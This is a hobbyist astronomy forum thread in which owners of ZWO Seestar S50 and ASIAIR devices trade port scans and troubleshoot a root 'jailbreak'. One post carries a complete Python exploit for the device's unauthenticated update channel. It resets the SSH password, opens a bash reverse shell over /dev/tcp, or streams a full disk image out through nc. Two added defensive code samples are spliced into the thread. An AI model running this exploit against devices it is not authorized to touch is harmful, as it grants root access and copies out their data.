
CNers have asked about a donation box for Cloudy Nights over the years, so here you go. Donation is not required by any means, so please enjoy your stay.


Seestar S50/ASIAIR Jailbreak + SSH

Software
177 replies to this topic

#26 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 01:46 PM

Stephanie,

 

Assuming those are all the open ports you may want to simply change the port in the script like I have listed in post #23. I don't know what you used to scan it, I am using MobaXterm on Windows and scanning the ASIAIR Pro with the stock ASIAIR_PRO_OS_V1.4.zip from their site and see the following open ports

 

FIRMWARE 4.35

- Port #22 (ssh):  listening
- Port #139 (netbios-ssn):  listening
- Port #445 (microsoft-ds):  listening
- Port #4030:  listening
- Port #4040:  listening
- Port #4350:  listening
- Port #4360:  listening
- Port #4400:  listening
- Port #4500:  listening
- Port #4700:  listening
- Port #4800:  listening
- Port #8888:  listening

 

What is interesting with the newer update is that they have the following ports open

 

FIRMWARE 10.74

- Port #22 (ssh):  listening
- Port #139 (netbios-ssn):  listening
- Port #445 (microsoft-ds):  listening
- Port #4030:  listening
- Port #4040:  listening
- Port #4350:  listening
- Port #4360:  listening
- Port #4400:  listening
- Port #4500:  listening
- Port #4700:  listening
- Port #4800:  listening
- Port #4801:  listening
- Port #8888:  listening

 

What I wanted to share in this post was the history command from the stock ASIAIR_PRO_OS_V1.4.zip image.

 

https://pastebin.com/31189rxq

Dear Viking1,

Thanks for having taken the time to respond. I have no doubt that all you describe is functional on ASIAIR Pro.

Unfortunately, I guess there is a misunderstanding about the subject of this thread. This thread is talking about the Seestar S50 from ZWO, which is a complete scope based partially on ASIAIR ... but this particular scope does not have a complete ASIAIR inside!! So, the answers that have been written so far do not respond to users like me, owning a Seestar and not an ASIAIR. The jailbreak created was done for the Seestar (and I have no doubt that it may work also on ASIAIR), but as the scope software has been restricted in its functionalities, some ports have been closed by ZWO to keep us from playing "underground" ... I am trying to find another solution to jailbreak it.

Kind regards,

Stephane.



#27 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 07 January 2024 - 02:08 PM

Dear Viking1,

Thanks for having taken the time to respond. I have no doubt that all you describe is functional on ASIAIR Pro.

Unfortunately, I guess there is a misunderstanding about the subject of this thread. This thread is talking about the Seestar S50 from ZWO, which is a complete scope based partially on ASIAIR ... but this particular scope does not have a complete ASIAIR inside!! So, the answers that have been written so far do not respond to users like me, owning a Seestar and not an ASIAIR. The jailbreak created was done for the Seestar (and I have no doubt that it may work also on ASIAIR), but as the scope software has been restricted in its functionalities, some ports have been closed by ZWO to keep us from playing "underground" ... I am trying to find another solution to jailbreak it.

Kind regards,

Stephane.

Stephane,

 

No, I completely understand you have the Seestar; what I was saying is to edit run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw open ports TCP 139 and UDP 137 / 138 / 1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There may be different ports open, and if not, one of those ports you found may work.



#28 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:14 PM

Stephane,

 

No, I completely understand you have the Seestar; what I was saying is to edit run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw open ports TCP 139 and UDP 137 / 138 / 1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There may be different ports open, and if not, one of those ports you found may work.

Thank you, I will try ... and if any, will post back here for all other users. Let's hope ... :)

KR.


  • joeytroy likes this

#29 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:26 PM

Stephane,

 

No, I completely understand you have the Seestar; what I was saying is to edit run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw open ports TCP 139 and UDP 137 / 138 / 1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There may be different ports open, and if not, one of those ports you found may work.

I did use "netstat -a" in a cmd window under Windows 10.



#30 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:35 PM

Stephane,

 

No, I completely understand you have the Seestar; what I was saying is to edit run_jailbreak.py on line 36 and try a different port number other than 4361. I know you mentioned you saw open ports TCP 139 and UDP 137 / 138 / 1900 / 5353 / 57668. Are there any other TCP ports open if you scan it with MobaXterm? There may be different ports open, and if not, one of those ports you found may work.

Port #139 (netbios-ssn): listening

Port #445 (microsoft-ds): listening

Port #6000 (x11 :0): listening

That's all, folks .......



#31 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 03:40 PM

Tried with port 445 and got:

D:\Astro\Seestar\Jailbreak>python run_jailbreak.py 10.0.0.93
Traceback (most recent call last):
  File "D:\Astro\Seestar\Jailbreak\run_jailbreak.py", line 59, in <module>
    begin_update(sys.argv[1], JAILBREAK_FILE)
  File "D:\Astro\Seestar\Jailbreak\run_jailbreak.py", line 41, in begin_update
    print('Got: ' + recv_all(s))
  File "D:\Astro\Seestar\Jailbreak\run_jailbreak.py", line 16, in recv_all
    chunk = sock.recv(1024)
ConnectionResetError: [WinError 10054] An existing connection was forcibly closed by the remote host

seem "bad luck" .....



#32 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 07 January 2024 - 03:53 PM

I did use "netstat -a" in a cmd window under Windows 10.

I would recommend installing MobaXterm and scanning it directly https://mobaxterm.mo...t/download.html. Once installed go to  Tools < Network scan once you see your seestar click on the deep scan and it will scan all ports. This is assuming you have your seestar connected to your local network.



#33 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 04:02 PM

I would recommend installing MobaXterm and scanning it directly https://mobaxterm.mo...t/download.html. Once installed go to  Tools < Network scan once you see your seestar click on the deep scan and it will scan all ports. This is assuming you have your seestar connected to your local network.

Exactly what I have done (did test your software), and only 3 ports. Did try the jailbreak on port 445 and not working.



#34 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 07 January 2024 - 04:04 PM

here is a capture screen:

Attached Thumbnails

  • Capture.JPG

Edited by Artimon, 07 January 2024 - 04:04 PM.


#35 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 07 January 2024 - 04:38 PM

here is a capture screen:

Bummer....yeah looks like they did something to lock it down, I am sure after seeing this post.



#36 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 08 January 2024 - 10:56 AM

FIRST OF ALL, THIS IS ALL ESSENTIALLY ONE GIANT HACK. IT HAS WORKED FOR ME BUT IT COULD BRICK YOUR DEVICE, OR WORSE. THIS IS FOR DEVELOPERS ONLY. IF YOU AREN'T FAMILIAR WITH SSH OR LINUX, DON'T USE THIS!

Hi everyone,

With the release of ZWO's new Seestar S50, I'm finally releasing a tool I've been using internally to gain root SSH access to both my Seestar and ASIAIR devices. I was originally hoping that ZWO would reduce their rampant open source software license violations and vendor lock-in, but it's only gotten worse. This has made me decide to create a completely FOSS integrated astrophotography solution that will totally replace their software while still leveraging the ASI hardware. I intend to release this project free of charge to the astronomical community shortly.

In the meantime, I am providing this jailbreak so that others can explore their ASIAIR device without the need of physically opening it and soldering on UART headers. To run it, all you need is a machine running a reasonably new Python 3 as well as the archive attached to this post.

[Current jailbreak release]

Run jailbreak:

python run_jailbreak.py [IP_ADDRESS_OF_DEVICE]

Connect to Seestar/ASIAIR:

ssh pi@[IP_ADDRESS_OF_DEVICE]

The password for SSH will be "raspberry" (no quotes) if the jailbreak ran successfully. You can access the root account via "sudo".


#37 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 08 January 2024 - 11:14 AM

Oh my!

 

Thank you, thank you!

 

I have for the longest time been trying to tap into ASI Air and Seestar's communication channel. A member in my group just led me to your original post today and my jaw just dropped.

I don't know how ZWO can leverage so many open source packages yet sell 2 completely closed systems with no programmatic access.

I started an underground Facebook group called Smart Telescope Underworld that focuses on sharing ideas on how to improve these telescopes with hacks and modifications. I figured out how to run Seestar in equatorial mode and to do spectroscopy, and shared the steps there. Others have broken into the case and started modifying the internal parts. My co-admin now is trying to access the electronics. You and people like you will be awesome additions to the group. Please check it out.

 

https://www.facebook...373417055173095

 

Kai


Edited by kaicyung, 08 January 2024 - 11:15 AM.

  • cmahar likes this

#38 joeytroy

joeytroy

    Viking 1

  • *****
  • Posts: 744
  • Joined: 14 Aug 2020
  • Loc: Belen, NM, USA

Posted 09 January 2024 - 12:39 PM

This also works on the Mini as well per the following instructions

 

https://www.cloudyni...ssh/?p=13177790

 

I used a USB Network Dongle to connect to the device with a network cable instead of doing the Wi-Fi station mode to my home network. Just plugged it in and it worked perfectly.

 

miniasiair-network.jpg



#39 Oxofrimbl

Oxofrimbl

    Lift Off

  • -----
  • Posts: 10
  • Joined: 09 Jan 2024

Posted 09 January 2024 - 01:51 PM

Hey Folks,

I did spend some time, and the port indeed changed on the Asiair; however, as indicated, it just slipped to 4360 instead of 4361.

I took the freedom and updated the script. Additionally, I streamlined the execution and other use cases.

 

  • Just the script is needed, it will take care of the packaging of the jailbreaking/hacking scripts itself
  • Auto-detection of the ports to use (4360 vs. 4361)
  • Added options for non-modifications such as:
  •    performing a full OS-dump, or
  •    getting a reverse-shell to the ip
# Seestar/ASIAIR jailbreak by @joshumax
# Licensed in the public domain
# Source Thread: https://www.cloudynights.com/topic/900861-seestar-s50asiair-jailbreak-ssh/
# Mod by Oxofrimbl to handle different ports and added a backup and reverse shell option without modifying the ASIAIR

import socket
import os
import hashlib
import sys
import tempfile
import tarfile
import argparse


JAILBREAK_FILE = 'jailbreak.tar.bz2'

JAILBREAK_SCRIPT = """
sudo mount -o remount,rw /

echo "pi:raspberry" | sudo chpasswd
sync

sudo mount -o remount,ro /
"""

def recv_all(sock):
    text = ''

    while True:
        chunk = sock.recv(1024)
        text += chunk.decode()

        if not chunk or chunk.decode().endswith('\n'):
            break

    return text


def begin_update(address, file):
    s = socket.socket()
    s_ota = socket.socket()

    file_contents = open(file,'rb').read()
    json_str = '{{"id":1,"method":"begin_recv","params":[{{"file_len":{file_len},"file_name":"air","run_update":true,"md5":"{md5}"}}]}}\r\n'
    fsize = os.path.getsize(file)
    fmd5 = hashlib.md5(file_contents).hexdigest()
    json_str = json_str.format(file_len = fsize, md5 = fmd5)

    # Connect to OTA file socket first
    try:
        print("Try to connect to binary port  4361 (legacy?)")
        s_ota.connect((address, 4361))
    except ConnectionRefusedError:
        try:
            print("Connection to 4361 failed, try to connect to binary port 4360 (new?)")
            s_ota.connect((address, 4360))
        except ConnectionRefusedError:
            print("Cannot connect to binary port")
            sys.exit(-2)

    # Then connect to OTA command socket
    s.connect((address, 4350))

    print('Got: ' + recv_all(s))

    print('Sending RPC: {rpc}'.format(rpc = json_str))
    s.sendall(json_str.encode())

    print('Got back: ' + recv_all(s))

    s_ota.sendall(file_contents)

    s_ota.close()
    s.close()


def create_patch(script_content=""):
    with tempfile.NamedTemporaryFile (mode='w+b',delete=False) as tf:
        # Write the script body behind a bash shebang
        tf.write(b'#!/bin/bash\n')
        tf.write(bytes(script_content,'UTF-8'))
        tf.close()
        # Pack the temp file into the archive as update_package.sh
        with tarfile.open(JAILBREAK_FILE, "w:bz2") as tarhandle:
            tarhandle.add(tf.name, "update_package.sh")

if __name__ == '__main__':
    create_patch()
    parser = argparse.ArgumentParser()
    parser.add_argument('--ip', required=True, help="Set the asiair ip")
    hostname = socket.gethostname()
    client_ip_adress  = socket.gethostbyname(hostname)

    parser.add_argument('--client-ip', help="Client IP in case this client dosnt serve as 'master'", default=client_ip_adress)
    parser.add_argument('--shell', help="Enter IP for reverse-shell connection 'nc -l 4242'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--backup', help="Enter IP for full system backup, client: 'nc -l 4444 | dd of=asiair.img'",action=argparse.BooleanOptionalAction)
    parser.add_argument('--jailbreak', help="PErform a Jailbreak by setting username:password for ssh to pi:raspberry",action=argparse.BooleanOptionalAction)
    args = parser.parse_args()
    client_ip_adress = args.client_ip

    if(not (args.jailbreak or args.backup  or args.shell)):
       print("Please use -h either, perform a jailbreak (rooting device), backup for a TCP port of the full image, or get a reverse shell to a target ip")
       sys.exit(-1)

    if(args.shell):
        create_patch(f"bash -i >& /dev/tcp/{client_ip_adress}/4242 0>&1")
        begin_update(args.ip, JAILBREAK_FILE)
    
    if(args.backup):
        create_patch(f"sudo dd if=/dev/mmcblk0 bs=1M | nc {client_ip_adress} 4444")
        begin_update(args.ip, JAILBREAK_FILE)
    
    if(args.jailbreak):
        create_patch(JAILBREAK_SCRIPT)
        begin_update(args.ip, JAILBREAK_FILE)

Hope that's useful to anyone.


Edited by Oxofrimbl, 09 January 2024 - 01:53 PM.

  • lambermo and edjuh like this
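Added example, not part of Oxofrimbl's post or of ZWO's code: the `begin_recv` request in the script carries only a length and an MD5 that the sender computes itself, so those fields can catch a corrupted transfer but say nothing about who built the package. The sketch contrasts a receiver that checks only those fields with one that also requires a keyed tag; the `sig` field, the function names, the HMAC stand-in for a vendor signature and the idea that a receiver validates only the visible fields are all assumptions.

```python
import hashlib
import hmac
import json
from typing import Optional

# Constructed demo key. A real device should verify an asymmetric signature
# against a public key in read-only storage; HMAC stands in for it here only
# because the standard library has no asymmetric signing.
VENDOR_KEY = b"constructed-demo-key"


def sign(payload: bytes, key: bytes = VENDOR_KEY) -> str:
    """Keyed tag over the package bytes (stand-in for a vendor signature)."""
    return hmac.new(key, payload, hashlib.sha256).hexdigest()


def build_request(payload: bytes, sig: Optional[str] = None) -> str:
    """Build a begin_recv line in the format shown in the thread."""
    params = {
        "file_len": len(payload),
        "file_name": "air",
        "run_update": True,
        "md5": hashlib.md5(payload).hexdigest(),
    }
    if sig is not None:
        params["sig"] = sig  # hypothetical field, not in the real protocol
    request = {"id": 1, "method": "begin_recv", "params": [params]}
    return json.dumps(request, separators=(",", ":")) + "\r\n"


def check_digest_only(request_line: str, payload: bytes) -> bool:
    """Accept when length and MD5 match: true for any self-consistent sender."""
    params = json.loads(request_line)["params"][0]
    digest = hashlib.md5(payload).hexdigest()
    return params.get("file_len") == len(payload) and params.get("md5") == digest


def check_authenticated(request_line: str, payload: bytes,
                        key: bytes = VENDOR_KEY) -> bool:
    """Additionally require a tag that only the key holder can produce."""
    if not check_digest_only(request_line, payload):
        return False
    sig = json.loads(request_line)["params"][0].get("sig")
    if not isinstance(sig, str):
        return False
    # Compare as bytes in constant time; str inputs must be ASCII otherwise.
    return hmac.compare_digest(sig.encode(), sign(payload, key).encode())


if __name__ == "__main__":
    vendor_pkg = b"constructed vendor package bytes"
    other_pkg = b"#!/bin/bash\n# constructed package from an unknown sender\n"
    print("digest-only accepts unknown sender:",
          check_digest_only(build_request(other_pkg), other_pkg))
    print("authenticated accepts unknown sender:",
          check_authenticated(build_request(other_pkg), other_pkg))
    print("authenticated accepts signed package:",
          check_authenticated(build_request(vendor_pkg, sign(vendor_pkg)), vendor_pkg))
```
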

#40 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 09 January 2024 - 02:30 PM

Hey Folks,

I did spend some time, and the port indeed changed on the Asiair; however, as indicated, it just slipped to 4360 instead of 4361.

I took the freedom and updated the script. Additionally, I streamlined the execution and other use cases.

 

  • Just the script is needed, it will take care of the packaging of the jailbreaking/hacking scripts itself
  • Auto-detection of the ports to use (4360 vs. 4361)
  • Added options for non-modifications such as:
  •    performing a full OS-dump, or
  •    getting a reverse-shell to the ip
Hope that's useful to anyone.

Waouw !! Thanks a lot! My Seestar is recording North America NGC1499 at present time (At least one clear night in Belgium since weekSSS, and without moon!) but after (or tomorrow) will test this script. Awesome job done, many Thanks!!


  • Tribe_Of_Dan likes this

#41 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 10 January 2024 - 05:25 AM

For seestar hackers, I am trying to find the config entries in the xml file that were exposed during the "hidden menu" build. Specifically, the one to save all Junked Fits. I am using the latest firmware but I don't see a relevant entry for this config. Does anyone have this info?

 

Kai



#42 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 03:53 AM

Can anyone tell me if the firmware images are part of the APK (in the case on Android)? Or is the firmware update/upgrade process yet-another workflow?
tia
mconsidine

#43 kaicyung

kaicyung

    Explorer 1

  • *****
  • Posts: 71
  • Joined: 27 Jul 2016

Posted 11 January 2024 - 07:38 AM

For seestar hackers, I am trying to find the config entries in the xml file that were exposed during the "hidden menu" build. Specifically, the one to save all Junked Fits. I am using the latest firmware but I don't see a relevant entry for this config. Does anyone have this info?

 

Kai

Nevermind. Figured it out.



#44 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 08:35 AM

Can anyone tell me if the firmware images are part of the APK (in the case on Android)? Or is the firmware update/upgrade process yet-another workflow?
tia
mconsidine

Hello mconsidine, Firmware is not part of the apk software application. If any updated firmware is available for your seestar, the apk will compare the version of firmware installed on your device, and propose that you upgrade. You are never obliged to upgrade (at present time, the software does not block you if not up-2-date with firmware ... hope it will stay like this), but you might have incompatibilities if both are not adapted to each other. For the option of the 10/20/30 seconds subframes, it seems to be firmware dependent. Hope this may help. Kr. Stéphane.



#45 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 09:12 AM

Thanks. Fyi, I'm seeing open ports up in the 4000s beyond what's been posted. But revised .py jailbreak above is returning a message saying "binary port is not connected".

Anything I should look for in output of nmap that might ID the right set of ports? 4350 and 4361 are shown as open, but not 4360.

Edited by mconsidine, 11 January 2024 - 09:13 AM.


#46 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 10:21 AM

Hey Folks,

I did spend some time, and the port indeed changed on the Asiair; however, as indicated, it just slipped to 4360 instead of 4361.

I took the freedom and updated the script. Additionally, I streamlined the execution and other use cases.

....

  • Just the script is needed, it will take care of the packaging of the jailbreaking/hacking scripts itself
  • Auto-detection of the ports to use (4360 vs. 4361)
  • Added options for non-modifications such as:
  •    performing a full OS-dump, or
  •    getting a reverse-shell to the ip

Hope that's useful to anyone.

Hi Oxofrimbl,

I did try your script on my seestar firmware v2.06 and did get this back. Do not know what to do with ......

 

"Got back:

Try to connect to binary port  6000 (legacy?)
Got:
Sending RPC: {"id":1,"method":"begin_recv","params":[{"file_len":264,"file_name":"air","run_update":true,"md5":"79a3831e7e6555f9c0335c824a1aa01b"}]}
"

 

... if you have any idea how to run into it as pi user?! ......

 

By the way, I have found those ports:

 

Tkx,

Stephane.

Attached Thumbnails

  • Capture2.JPG

Edited by Artimon, 11 January 2024 - 10:24 AM.


#47 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 11:43 AM

Hmmm...

 

Attached Thumbnails

  • Capture.PNG


#48 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 12:54 PM

Hmmm...

Please, indicate also the firmware version, as from one to another, ports are not the same !! in my case, 2.06.



#49 mconsidine

mconsidine

    Explorer 1

  • -----
  • Posts: 94
  • Joined: 16 Nov 2006

Posted 11 January 2024 - 01:09 PM

Right ... apologies for that.

App version is 1.13.1

Firmware is 2.06

Platform is Android

 

Going at it from Linux (Mint; Ubuntu) via nmap at the command line:

 

nmap -v -p 1-65535 -A 192.168.1.84
Starting Nmap 7.80 ( https://nmap.org ) at 2024-01-11 08:55 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating NSE at 08:55
Completed NSE at 08:55, 0.00s elapsed
Initiating Ping Scan at 08:55
Scanning 192.168.1.84 [2 ports]
Completed Ping Scan at 08:55, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:55
Completed Parallel DNS resolution of 1 host. at 08:55, 0.00s elapsed
Initiating Connect Scan at 08:55
Scanning SeeStar (192.168.1.84) [65535 ports]
Discovered open port 80/tcp on 192.168.1.84
Discovered open port 445/tcp on 192.168.1.84
Discovered open port 22/tcp on 192.168.1.84
Discovered open port 139/tcp on 192.168.1.84
Discovered open port 1935/tcp on 192.168.1.84
Discovered open port 4040/tcp on 192.168.1.84
Discovered open port 4701/tcp on 192.168.1.84
Discovered open port 4700/tcp on 192.168.1.84
Discovered open port 4350/tcp on 192.168.1.84
Discovered open port 4030/tcp on 192.168.1.84
Discovered open port 4361/tcp on 192.168.1.84
Discovered open port 4400/tcp on 192.168.1.84
Discovered open port 4500/tcp on 192.168.1.84
Discovered open port 4800/tcp on 192.168.1.84
Discovered open port 4801/tcp on 192.168.1.84
Completed Connect Scan at 08:55, 5.88s elapsed (65535 total ports)
Initiating Service scan at 08:55
Scanning 15 services on SeeStar (192.168.1.84)

 

mconsidine
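Added example, not from any poster in this thread: the port lists posted above, parsed from both formats (the MobaXterm-style list and `nmap -v` output), to show what changed between firmware versions and whether the update channel the script uses (4350 plus 4360 or 4361) is reachable, which is what an owner needs to know before deciding what to firewall. Function and variable names are assumptions; the scan text is copied from the posts.

```python
import re

# Port roles as used by the script posted in this thread.
OTA_COMMAND_PORT = 4350
OTA_FILE_PORTS = (4360, 4361)

_PATTERNS = (
    re.compile(r"Port #(\d+).*?:\s*listening", re.IGNORECASE),  # MobaXterm list
    re.compile(r"Discovered open port (\d+)/tcp"),               # nmap -v output
)


def parse_open_ports(scan_text):
    """Return the set of open TCP ports named in either scan format."""
    ports = set()
    for line in scan_text.splitlines():
        for pattern in _PATTERNS:
            match = pattern.search(line)
            if match:
                ports.add(int(match.group(1)))
                break
    return ports


def surface_diff(old, new):
    """Ports that appeared and disappeared between two scans."""
    return {"added": sorted(new - old), "removed": sorted(old - new)}


def ota_exposure(ports):
    """The update channel needs the command port and one file port reachable."""
    file_ports = [p for p in OTA_FILE_PORTS if p in ports]
    command = OTA_COMMAND_PORT in ports
    return {"command": command, "file_ports": file_ports,
            "reachable": command and bool(file_ports)}


# Scan text copied from the posts in this thread.
ASIAIR_FW_4_35 = """
- Port #22 (ssh):  listening
- Port #139 (netbios-ssn):  listening
- Port #445 (microsoft-ds):  listening
- Port #4030:  listening
- Port #4040:  listening
- Port #4350:  listening
- Port #4360:  listening
- Port #4400:  listening
- Port #4500:  listening
- Port #4700:  listening
- Port #4800:  listening
- Port #8888:  listening
"""
# The 10.74 list in the same post is identical except for one extra port.
ASIAIR_FW_10_74 = ASIAIR_FW_4_35 + "- Port #4801:  listening\n"

SEESTAR_POST_30 = """
Port #139 (netbios-ssn): Listening
Port #445 (microsoft-ds): listening
Port #6000 (x11 :0): listening
"""

SEESTAR_POST_49 = """
Discovered open port 80/tcp on 192.168.1.84
Discovered open port 445/tcp on 192.168.1.84
Discovered open port 22/tcp on 192.168.1.84
Discovered open port 139/tcp on 192.168.1.84
Discovered open port 1935/tcp on 192.168.1.84
Discovered open port 4040/tcp on 192.168.1.84
Discovered open port 4701/tcp on 192.168.1.84
Discovered open port 4700/tcp on 192.168.1.84
Discovered open port 4350/tcp on 192.168.1.84
Discovered open port 4030/tcp on 192.168.1.84
Discovered open port 4361/tcp on 192.168.1.84
Discovered open port 4400/tcp on 192.168.1.84
Discovered open port 4500/tcp on 192.168.1.84
Discovered open port 4800/tcp on 192.168.1.84
Discovered open port 4801/tcp on 192.168.1.84
"""

if __name__ == "__main__":
    print(surface_diff(parse_open_ports(ASIAIR_FW_4_35),
                       parse_open_ports(ASIAIR_FW_10_74)))
    for name in ("SEESTAR_POST_30", "SEESTAR_POST_49"):
        print(name, ota_exposure(parse_open_ports(globals()[name])))
```
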



#50 Artimon

Artimon

    Sputnik

  • -----
  • Posts: 33
  • Joined: 07 Dec 2023

Posted 11 January 2024 - 01:23 PM

Right ... apologies for that.

App version is 1.13.1

Firmware is 2.06

Platform is Android

 

Going at it from Linux (Mint; Ubuntu) via nmap at the command line:

 


 

mconsidine

OK, good to know. The difference between us, is that you did connect your SS on your local network (192.168.x.x) Am I right? In my case, I did connect to it via 10.0.0.93, because my SS is hotspot. 

Then, could you connect to it and jailbreak it? If yes, after the jailbreak, what did you do with it? Should be interesting for all of us ;)



